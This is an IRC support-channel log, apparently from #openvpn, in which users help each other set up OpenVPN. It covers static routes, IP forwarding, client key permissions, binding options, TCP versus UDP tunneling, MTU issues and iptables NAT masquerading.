04:41 < pppingme> I'll admit for single networks I always use a /24 mostly out of laziness
04:41 <@EugeneKay> I reserve a /16 out of 10/8 for each of my "sites"; each LAN gets a /20; and then each static box gets a /28. It's a bit oversized, but it has its merits
04:41 <@EugeneKay> DHCP gets its own /24, which means my rDNS zones can be "clean" except for that one.
04:41 < jzaw> im curious what my Polish cable operator is doing when i have a pub ip and the 3rd hop i
04:42 < jzaw> is
04:42 < jzaw> 3. 172.20.0.4 0.0% 8 16.4 17.9 14.4 23.2 2.7
04:42 <@EugeneKay> And for boxes which need >1 IP I don't have to make them non-contiguous.
04:42 < pppingme> they have a router that doesn't have a public ip for whatever reason
04:42 <@EugeneKay> It's possible to route traffic carrying public IPs over RFC1918
04:42 < jzaw> yeah
04:42 <@EugeneKay> It saves you a few addresses
04:43 < pppingme> if a box doesn't need to be directly addressed from the 'net (even if it does carry traffic) there's technical need for a public ip, although many would argue thats wrong
04:43 < jzaw> unnecessary in the eu I'd have said
04:43 < pppingme> wrong being bad practice, not wrong in a way that breaks things
04:45 < jzaw> being as i know who runs the network I'd say they do a lot of bad practice
04:59 < pppingme> you're back
05:02 <@EugeneKay> No I'm not.
05:13 < cippaciong> pppingme: I should be back :)
06:12 < pppingme> cippaciong hey
06:12 < pppingme> just saw ya
06:13 < cippaciong> I'm here
06:13 < pppingme> did you get your local network renumbered to the new range?
06:14 < cippaciong> yes
06:14 < cippaciong> 10.8.10.1 is the router
06:14 < cippaciong> .2 to .30 static
06:14 < cippaciong> dhcp others
06:14 < pppingme> sweet
06:15 < pppingme> whats the ip of the openvpn server?
06:15 < cippaciong> 10.8.10.9
06:15 < pppingme> ok, and you've done the portforward?
06:15 < cippaciong> yes
06:15 < cippaciong> I'm using 1194
06:15 < pppingme> ok, one last thing you should do on your router..
06:16 < pppingme> there's a place to add static routes
06:16 < cippaciong> yep
06:16 < pppingme> you need to add a route for 10.8.0.0/24 (mask 255.255.255.0) and make its next hop or destination be the vpn server 10.8.10.9
06:17 < cippaciong> 10.8.0.0 because is the ip range I chose in the server instance right?
06:17 < cippaciong> in server.conf
06:18 < pppingme> right (you haven't changed that, right?)
06:18 < cippaciong> right
06:18 < cippaciong> my router config page says
06:19 < cippaciong> "destination ip"
06:19 < cippaciong> I suppose is 10.8.10.9
06:19 < pppingme> that would be the 10.8.10.9
06:19 < pppingme> right
06:19 < cippaciong> subnet
06:19 < cippaciong> 255.255.255.0
06:19 < pppingme> right
06:19 < cippaciong> and then gateway ip
06:19 < pppingme> oops, wait, I mis-stated..
06:19 < pppingme> destination ip would be 10.8.0.0
06:19 < pppingme> subnetmask would be 255.255.255.0
06:20 < pppingme> and gateway would be 10.8.10.9
06:20 < pppingme> my bad..
06:20 < cippaciong> ok
06:20 < cippaciong> makes more sense
06:20 < pppingme> I mis-read what you said..
06:20 < cippaciong> and then I have another field
06:20 < cippaciong> called "Metric"
06:20 < pppingme> leave it at default, if it forces you to put something in, put a 1
06:20 < cippaciong> ok
06:21 < cippaciong> mmm
06:22 < cippaciong> In the guide says that metric should be in a range of 1-15
06:22 < pppingme> mmm??
06:22 < cippaciong> but if I put 1
06:22 < pppingme> your router guide? you're setting it to 1 if it doesn't have a default
06:22 < cippaciong> yes, I have a brief guide in a lateral panel
06:22 < cippaciong> but if I set 1 it says
06:23 < cippaciong> "not between 2 - 15"
06:23 < pppingme> hmm.. ok, use 2..
06:23 < cippaciong> worked
06:24 < pppingme> you haven't already added a route for 10.8.0.0 for another reason have you?
06:24 < cippaciong> oh, there was also an option to make it private
06:24 < cippaciong> I left it unchecked
06:24 < pppingme> hmm.. not even sure what that would do, must be some vendor specific thing
06:24 < cippaciong> it's to limit the access to LAN pc only
06:26 < pppingme> ok, I probably wouldn't check it
06:26 < cippaciong> ok
06:26 < pppingme> is your vpn server a linux box?
06:26 < cippaciong> yes
06:26 < cippaciong> is archlinux-arm
06:26 < cippaciong> running on raspberry
06:26 < pppingme> there's a file /etc/sysctl.conf
06:27 < pppingme> there's probably a line in it that says net.ipv4.ip_forward
06:27 < pppingme> does it end with =0 or =1 ?
06:27 < cippaciong> 0
06:27 < pppingme> ok, change that to 1..
06:27 < cippaciong> ok
06:28 < cippaciong> are these settings global?
06:28 < pppingme> then run sysctl -p
06:28 < pppingme> for that box, yeah
06:28 < cippaciong> because I use netcfg to connect to the network
06:28 < cippaciong> an archlinux tool
06:28 < pppingme> otherwise you won't be able to see other hosts on the network
06:28 < pppingme> netcfg won't touch that setting
06:28 < cippaciong> ok
06:28 < pppingme> at least not the last version I saw..
06:29 < cippaciong> done
06:29 < pppingme> ok, one last detail, in your server.conf or whatever you called it (the openvpn.conf file) add a line that says:
06:30 < pppingme> push route 10.8.10.0 255.255.255.0
06:31 < pppingme> after that, everything should be routable
06:31 < pppingme> (unless you have some firewall rules on your vpn server thats barfing it)
06:32 < cippaciong> no, I'm using the router built in firewall
06:32 < cippaciong> I already had that line
06:32 < cippaciong> push "route 10.8.10.0 255.255.255.0"
06:32 < pppingme> that works..
06:33 < cippaciong> so this should be all, right?
06:33 < pppingme> then you're done.. now test.. a vpn client should get a 10.8.0.x ip and should be able to ping anything on the 10.8.10.x network
06:33 < pppingme> yep
06:33 < cippaciong> can I test it in the same network?
06:34 < pppingme> not a good idea, test from outside if you can
06:34 < cippaciong> let's try then =)
06:34 < cippaciong> oh ok
06:34 < pppingme> the reason is the same as why I told you its a bad idea to leave your base network at 192.168.0.x
06:35 < cippaciong> ok then
06:35 < cippaciong> I'll try on another network
06:35 < cippaciong> well..
06:36 < cippaciong> thanks a lot pppingme, really
06:36 < cippaciong> this afternoon I'll test it and then I'll let you know :D
08:39 < cippacio1> pppingme: routing works perfectly
08:39 < cippacio1> thank you
08:40 < cippacio1> I'm on another network and I can ping the server with both 10.8.0.1 and 10.8.10.9
08:41 < cippacio1> next step is connecting to the samba share ;)
10:02 < cippacio1> what should be the correct owner and permissions for a client.key?
10:02 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Ping timeout: 245 seconds] 10:03 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:04 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Client Quit] 10:05 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 10:12 -!- Cpt-Oblivious|af [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 10:30 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 10:35 -!- epochwolf [~root@unaffiliated/epochwolf] has left #openvpn ["Textual IRC Client: http://www.textualapp.com/"] 10:38 -!- xbanux [~xbanux@triband-mum-59.182.157.239.mtnl.net.in] has quit [Read error: Connection reset by peer] 10:38 -!- xbanux [~xbanux@triband-mum-59.182.131.162.mtnl.net.in] has joined #openvpn 10:41 < dropje> cippacio1: client.key should only be available to the client 10:43 < cippacio1> dropje: ok, but talking about linux clients 10:44 < cippacio1> should it be owned by root or by normal user? 11:02 -!- raidz_away is now known as raidz 11:02 < dropje> cippacio1: you need to run the openvpn binary initially as root, so i think only root needs to be able to read it 11:03 <@EugeneKay> Technically not, but it's a good simplification 11:03 <@EugeneKay> You need to be able to run it as a user allowed to control the tun/tap device and use `ip` ;-) 11:04 < cippacio1> I'm asking because I'd like to try to use the NetworkManager gui to connect to the VPN 11:05 < cippacio1> but if the client.key is owned by root then I can't select it when aske 11:08 < cippacio1> if I change the owner of the key to my default user, do I break security? 
11:10 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 11:11 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 11:19 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 252 seconds] 11:20 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 11:20 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has quit [Ping timeout: 258 seconds] 11:20 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 11:21 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 256 seconds] 11:27 -!- cippacio1 [~cippacion@ppp-108-13.21-151.libero.it] has quit [Ping timeout: 256 seconds] 11:28 -!- cippacio1 [~cippacion@95.236.151.104] has joined #openvpn 11:30 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 11:34 -!- cippacio1 [~cippacion@95.236.151.104] has quit [Quit: WeeChat 0.4.0] 12:00 -!- dazo is now known as dazo_afk 12:03 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 12:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:12 -!- speed_racer8 [~speed_rac@h4.185.30.71.dynamic.ip.windstream.net] has joined #openvpn 12:12 -!- benkay [~benkay@67.50.19.230] has joined #openvpn 12:21 < benkay> so I'm looking at the redirect flow 12:21 < benkay> er, troubleshooting diagram 12:21 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has quit [Ping timeout: 272 seconds] 12:21 < benkay> this assumes that I'm connected to the vpn while running these tests, correct? 
12:31 -!- Orbi [~opera@anon-163-206.vpn.ipredator.se] has quit [Quit: Orbi] 12:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 12:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 12:43 -!- cippaciong [~cippacion@95.236.151.104] has quit [Quit: WeeChat 0.4.0] 12:50 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 12:53 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 12:55 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 12:56 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 13:00 -!- Cpt-Oblivious|af is now known as Cpt-Oblivious 13:08 -!- p3rror [~mezgani@41.248.139.241] has joined #openvpn 13:14 -!- benkay [~benkay@67.50.19.230] has quit [Quit: benkay] 13:23 <@EugeneKay> Yes 13:24 < rob0> No! 13:28 -!- p3rror [~mezgani@41.248.139.241] has quit [Quit: Leaving] 13:29 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 13:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:30 <@krzee> CPU: Intel Core i7-3740QM 2.70GHz @ 2.7GHz [SSE3/SSSE3/SSE4.1/SSE4.2/x86_64/PAE/XD/VT/EST/OctaCore] L3: 6MB QPI: 0.1 GT/s RAM: 7.1GB/16.0GB swap: 3338.96M/4096.00M Disk: 48.22GB/465.48GB GPU: Intel HD Graphics 4000 & NVIDIA GeForce GT 650M [512 MB & 1024 MB/Stock] 2880X1800 OS: Mac OS X 10.8.3 (12D78) Kernel: 12.3.0 Arch: 64 Bit 13:31 <@EugeneKay> Always so negative 13:31 * EugeneKay cries 13:32 <@krzee> this thing is a beast 13:34 <@EugeneKay> I've been eyeballing the new Dell XPS 13 13:36 -!- js_ [~js@li503-152.members.linode.com] has quit [Ping timeout: 255 seconds] 13:36 -!- js_ [~js@li503-152.members.linode.com] has joined #openvpn 13:41 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 256 seconds] 13:43 <@EugeneKay> I tihnk I'm gonna wait for the next gen of "Ultrabooks" though. 
Intel specs for them mandate a 9 hour battery life, and touchscreen. 13:44 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out] 13:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:04 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn [] 14:04 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 14:04 -!- mode/#openvpn [+o mattock] by ChanServ 14:06 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:23 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Main screen turn off] 14:23 -!- xbanux [~xbanux@triband-mum-59.182.131.162.mtnl.net.in] has quit [Ping timeout: 264 seconds] 14:33 -!- mitz [~mitz@khp222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 14:36 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 272 seconds] 14:46 -!- djgerm [~Adium@75-149-56-244-SFBA.hfc.comcastbusiness.net] has joined #openvpn 14:47 < djgerm> Heya! I was wondering if anyone knows how to set the client source IP for openvpn in the client's config 14:47 < djgerm> i have multiple ip's per interface on my client, and I want to specify openvpn client to bind to a particular ip 14:48 < djgerm> like the "local" options for the server side 14:50 < pekster> djgerm: Use the --local option, just as you would on the server side, to specify the bind IP. Note that use of --port implies --lport. Change this yourself if the default is not what you want 14:51 < djgerm> thanks! 14:51 <@krzee> you may also need something in your firewall 14:51 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Remote host closed the connection] 14:51 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 14:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:52 < djgerm> thanks, I'll keep that in mind. 
14:53 < djgerm> those dang firewalls, always causing trouble 14:54 < djgerm> i have nobind in that client config, should i take that out? 14:54 < djgerm> or that specifically for local port binding? 14:54 < pekster> Yup. local and nobind are incompatible 14:55 < djgerm> ok, makes sense 14:55 < pekster> --nobind pushes back to the OS to dynamically allocate an IP/port to sourceo the connection from. You give that feature up when you use either 14:55 <@krzee> bbl, ups dying and power out 14:56 <@krzee> (connection reset by 3rd world dsl) 14:58 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 15:01 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 252 seconds] 15:06 -!- CygniX [~CygniX@unaffiliated/twois10] has joined #openvpn 15:18 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 15:20 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has joined #openvpn 15:20 -!- Denial [~Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 256 seconds] 15:20 -!- Denial- is now known as Denial 15:29 -!- speed_racer8 [~speed_rac@h4.185.30.71.dynamic.ip.windstream.net] has quit [Ping timeout: 272 seconds] 15:35 -!- tcamuso_ [tcamuso@nat/redhat/x-hljszfqzgrogsjjn] has quit [Ping timeout: 255 seconds] 15:49 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:49 -!- mode/#openvpn [+o krzee] by ChanServ 15:55 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has joined #openvpn 15:57 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:00 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: quit] 16:09 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has quit [Quit: Linkinus - http://linkinus.com] 16:11 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn 16:20 -!- master_of_master [~master_of@p4FF24672.dip.t-dialin.net] has quit [Ping timeout: 
246 seconds] 16:22 -!- master_of_master [~master_of@p4FF24D8B.dip.t-dialin.net] has joined #openvpn 16:30 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 16:37 -!- djgerm [~Adium@75-149-56-244-SFBA.hfc.comcastbusiness.net] has left #openvpn [] 16:51 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:03 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 17:05 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has quit [Ping timeout: 256 seconds] 17:13 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has joined #openvpn 17:21 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 17:22 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has quit [Read error: Connection reset by peer] 17:23 -!- mitz [~mitz@khp222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 272 seconds] 17:33 -!- JSharpe [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has quit [Read error: Connection reset by peer] 17:33 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:33 -!- JSharpe [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has joined #openvpn 17:35 -!- CygniX [~CygniX@unaffiliated/twois10] has quit [Quit: Konversation terminated!] 17:39 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 17:49 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 18:02 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has quit [Quit: nonotza] 18:02 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection] 18:03 < jzaw> lol pekster does reading and talking about a thing make it start to exhibit 18:03 < jzaw> suddenly i had tx problems over ssh over vpn ... tcp-nodelay helps .... 
but still not as good as yesterday 18:03 < jzaw> self prophetic eh 18:18 -!- SuperGauntlet [~supergaun@d14-69-67-219.try.wideopenwest.com] has joined #openvpn 18:19 < SuperGauntlet> quick question, do I need to specify proto tcp in client.conf if I'm connecting to a TCP server or is it automatic? 18:19 < Poster> you need to specify, default is UDP 18:19 < SuperGauntlet> so just do proto tcp in client.conf? 18:20 <@krzee> !tcp 18:20 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 18:21 < SuperGauntlet> Does that go in server.conf? 18:21 <@krzee> both confs must be on tcp 18:21 < SuperGauntlet> right, but the tcp-nodelay option is in server.conf correct? 18:23 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 18:28 <@krzee> The macro expands as follows: 18:28 <@krzee> if mode server: 18:28 <@krzee> socket-flags TCP_NODELAY 18:28 <@krzee> push "socket-flags TCP_NODELAY" 18:30 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 18:51 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 
18:58 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 19:01 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Remote host closed the connection] 19:15 -!- tcamuso_ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] has joined #openvpn 19:23 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:24 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 19:30 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 255 seconds] 19:31 -!- raidz is now known as raidz_away 19:32 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 19:43 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Quit: I love my HydraIRC -> http://www.hydrairc.com <-] 19:47 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 19:47 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 19:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 20:04 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 20:15 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 21:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 21:20 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 21:32 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:33 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 21:49 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has joined #openvpn 21:51 -!- zarrsh [~zarrsh@cpe-65-27-192-220.cinci.res.rr.com] has joined #openvpn 21:53 -!- penk [~dave@216.142.113.243] has joined #openvpn 22:02 -!- dfoolz [~Anon@94.75.239.204] has joined #openvpn 22:02 < dfoolz> hello. anyone feel like offering some assistance? 
I've got openvpn server setup and connected with a windows client, but can't seem to figure out how to actually tunnel any of my traffic through the vpn connection. 22:04 < dfoolz> I see the TAP adapter is connected under LAN2, but it says there is no network access on the connection and there are very few packets being sent/received 22:04 < dfoolz> tracerout on the ip im assigned on client takes me nowhere :/ 22:05 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 22:05 < dfoolz> openvpn.log is just showing: Need IPv6 code in mroute_extract_addr_from_packet 22:15 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 22:15 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 22:17 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 22:17 -!- dfoolz [~Anon@94.75.239.204] has quit [Ping timeout: 245 seconds] 22:21 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Ping timeout: 245 seconds] 22:37 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 22:37 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 22:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 22:40 -!- penk [~dave@216.142.113.243] has quit [Quit: Leaving...] 23:08 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 23:10 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 23:34 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has joined #openvpn 23:36 < TORcruzer> UDP on Linux, I can Ping, DNS, Even 'short' http requests. However, any real website like google drops off after first GET request. This happens on both TUN and TAP. Any ideas? 23:36 < Poster> are you allowing ICMP across the link? 
23:38 < Poster> my guess is that you're needing fragmentation for larger requests, remember your MTU is going to be smaller on a VPN link due to encryption overhead 23:42 < TORcruzer> I am fairly sure I am. I know Ping request go though. Is there a specific ICMP type that you think may be killing the connection? --- Shoot, I can't find the page now, but I did try setting the mssfixed and mss 1300 (I think) and mtu 1500... Same problem 23:44 < TORcruzer> TCP no problem at all. However my ISP RoadRunner dose Traffic shapping on many IP ranges. My VPS is one of them. The max speed Road Runner will let any single TCP connect run at is 3Mb/s. iperf shows that I get can get 10Mb/s with UDP 23:45 < TORcruzer> Question: Is this Legal in the USA ? Selective IP/Domain rate limiting? 23:45 < Poster> is your UDP connection on port 53? 23:46 < Poster> the ICMP type I was going to suggest watching for is fragmentation needed 23:46 < TORcruzer> I ran iperf over port 5001 UDP. 10Mb/s TCP on any port is caped at 3Mb/s 23:46 < Poster> how many threads did you use to get 10Mb/s ? 23:47 < TORcruzer> iperf defualt settings with the -u ... 23:47 < Poster> a 10Mb connection is not likely going to see 10Mb on a single transfer ; you really need to have multiples to see the speed 23:47 < Poster> which you probably did with iperf 23:48 < Poster> there's latency and possibly packet loss which neither of which generally exist on a LAN 23:48 < TORcruzer> Well, I can download a file from my HTTP server... Caped at 3Mb/s Kernel.org HTTP 10Mb/s 23:48 -!- Anonmoose_ [~Anon@94.75.243.165] has joined #openvpn 23:48 < Anonmoose_> okay so I'm connected and the dns requests seem to be going through openvpn on the server 23:49 < Anonmoose_> but nothing will load beyond that :c 23:49 < Anonmoose_> i think it has to do with the nat forwarding in iptables, but im not sure how to fix it :/ 23:49 < TORcruzer> 7Mb/s seems a little much for TCP overhead ? 
23:49 < Poster> ok well that's pretty good ; can others get more than 3Mb/s from your HTTP server? 23:49 < TORcruzer> Not all domains are rate limited. Like Kernel.org is not. 23:50 < TORcruzer> Yes, I can transfer at 50Mb/s to my other server 23:50 < TORcruzer> Like server to server 23:50 < Poster> are they near eachother? 23:51 < TORcruzer> Yes, On is NL other in Germany. Both VPS's 23:51 < Poster> ok and what is your download speed from your other server? 23:51 < TORcruzer> 8Mb/s 23:52 < Poster> do they share common routes to you? 23:52 < TORcruzer> That I do not know. However, they are diffrinet VPS hosting providers 23:53 < Poster> from what I can tell kernel.org is west coast USA and your VPS are in Europe 23:53 < TORcruzer> Yes 23:53 < Poster> not sure where you are but I am guessing you're getting higher latency to Europe 23:53 < TORcruzer> Yes, I latency, but through put should not be effected that much 23:54 < TORcruzer> ... correction Yes, High latency 23:54 < Poster> you might be surprised 23:55 < TORcruzer> I'll try downloading from a linux mirror in NL ... 23:56 < Poster> Anonmoose_: are you trying to route all traffic across your link? 23:57 < Anonmoose_> Poster: Yep. 23:57 < Anonmoose_> All my local traffic (apart from some ssh tunnels) seem to be going through the VPN, and I can see the dns requests hitting the remote vpn in wireshark, however, nothing works beyond that. 23:58 < Poster> ok did you setup your VPN link to become the default gateway? 23:58 < Anonmoose_> with this in the client config? redirect-gateway def1 23:59 < Anonmoose_> that does seem to be doing the trick of forwarding all local traffic (apart from my ssh tunnels, which stay connected like normal) 23:59 < Poster> ok so what OS is the remote side? 23:59 < Anonmoose_> debian 23:59 < Poster> ok have you enabled IP forwarding? --- Day changed Sat Mar 23 2013 00:00 < Anonmoose_> through iptables? 
I tried, but I'm pretty nub at it and I'm sure it's not properly configured 00:00 < Poster> ok first try this 00:00 < Poster> cat /proc/sys/net/ipv4/ip_forward 00:00 < Poster> does it return a 0 or 1 ? 00:01 < Anonmoose_> 1. I did get that done :) 00:01 <@EugeneKay> !linipforward 00:01 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 00:01 < Poster> ok so from your VPN client, try to ping the public IP of the Debian host 00:01 < Poster> and watch to see the traffic across wireshark 00:02 < Anonmoose_> oooh that does seem to bee connecting :) 00:02 < Poster> ok and when you try to ping other sites on the Internet, is that failing? 00:02 < Anonmoose_> yep, after the dns request it just times out 00:02 < Anonmoose_> but I do see it in wireshark hitting the remote servers dns 00:02 < Poster> ok on you Debian host, assuming your public adapter is eth0, type this 00:03 < Poster> sudo /sbin/iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 00:03 < Poster> then retry pinging a remote host on the Internet from your VPN client 00:03 < Anonmoose_> hmmm still just timing out 00:04 < Anonmoose_> I wonder if it could be the dns server failing. 00:04 < Poster> is eth0 your public interface? 00:04 < Anonmoose_> actually I dont think so because I cant access IP's directly either 00:04 < Anonmoose_> yeah it is 00:04 < Poster> ok, try a traceroute to the Debian public IP 00:04 < Poster> does it traverse the VPN? 
00:06 < Anonmoose_> hmmm 00:06 < Anonmoose_> oddly enough it took the regular route through my isp to the remote server 00:06 < Anonmoose_> going very slow too 00:07 < Poster> ok doesn't sound like the client is routing all traffic to the VPN system 00:07 < Anonmoose_> yeah it took a long time but it finally made it to the remote ip 00:07 < Anonmoose_> hmmmm 00:07 < Poster> can you ping the other side of the VPN tunnel by it's (presumably private) IP address? 00:08 < Anonmoose_> yep, the ip it assigned (10.8.0.6) is responding to pings 00:08 < Poster> ok what is the client OS? 00:08 < Anonmoose_> doze :x 00:08 < Poster> ok try this ; start -> run -> cmd 00:08 < Poster> route add 8.8.8.8 mask 255.255.255.255 10.8.0.6 00:08 < Poster> then try to ping 8.8.8.8 00:09 < Anonmoose_> OK! 00:09 < TORcruzer> Poster: Hum... Okay so I guess you are right, they may be trafic shaping but that is not proof... I'll drop that. 00:09 < Poster> TORcruzer; unfortunately latency does nasty things to bandwidth =[ 00:09 < Anonmoose_> hmm reply from 10.8.0.6: Destination host unreachable 00:10 < Poster> ok is the Debian host running iptables? 00:10 < Poster> aside from what I suggested you add earlier 00:11 < Anonmoose_> yep 00:12 < Poster> ok, based on what you're reporting, there is likely an iptables rule on FORWARD which is rejecting forwarding of packets 00:12 < Anonmoose_> is there a way I can list the ones currently active? 
